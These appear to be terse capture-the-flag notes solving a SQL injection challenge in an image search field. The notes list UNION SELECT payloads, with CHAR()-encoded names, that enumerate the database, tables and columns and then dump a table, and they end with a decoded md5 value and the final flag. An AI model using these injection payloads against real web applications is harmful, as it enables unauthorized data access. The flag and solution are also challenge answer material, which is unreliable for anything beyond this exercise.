in search image
1 UNION SELECT 1, database()
database name is Member_images
1 UNION SELECT 1, TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = CHAR(77,101,109,98,101,114,95,105,109,97,103,101,115)
table is list_images
1 UNION SELECT 1, COLUMN_NAME, 3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = CHAR(77,101,109,98,101,114,95,105,109,97,103,101,115) AND TABLE_NAME = CHAR(108,105,115,116,95,105,109,97,103,101,115)
columns are id url title comment
1 UNION SELECT title, comment FROM list_images
If you read this just use this md5 decode lowercase then sha256 to win this flag ! : 1928e8083cf461a51303633093573c46
md5 decode albatroz
flag is: f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188
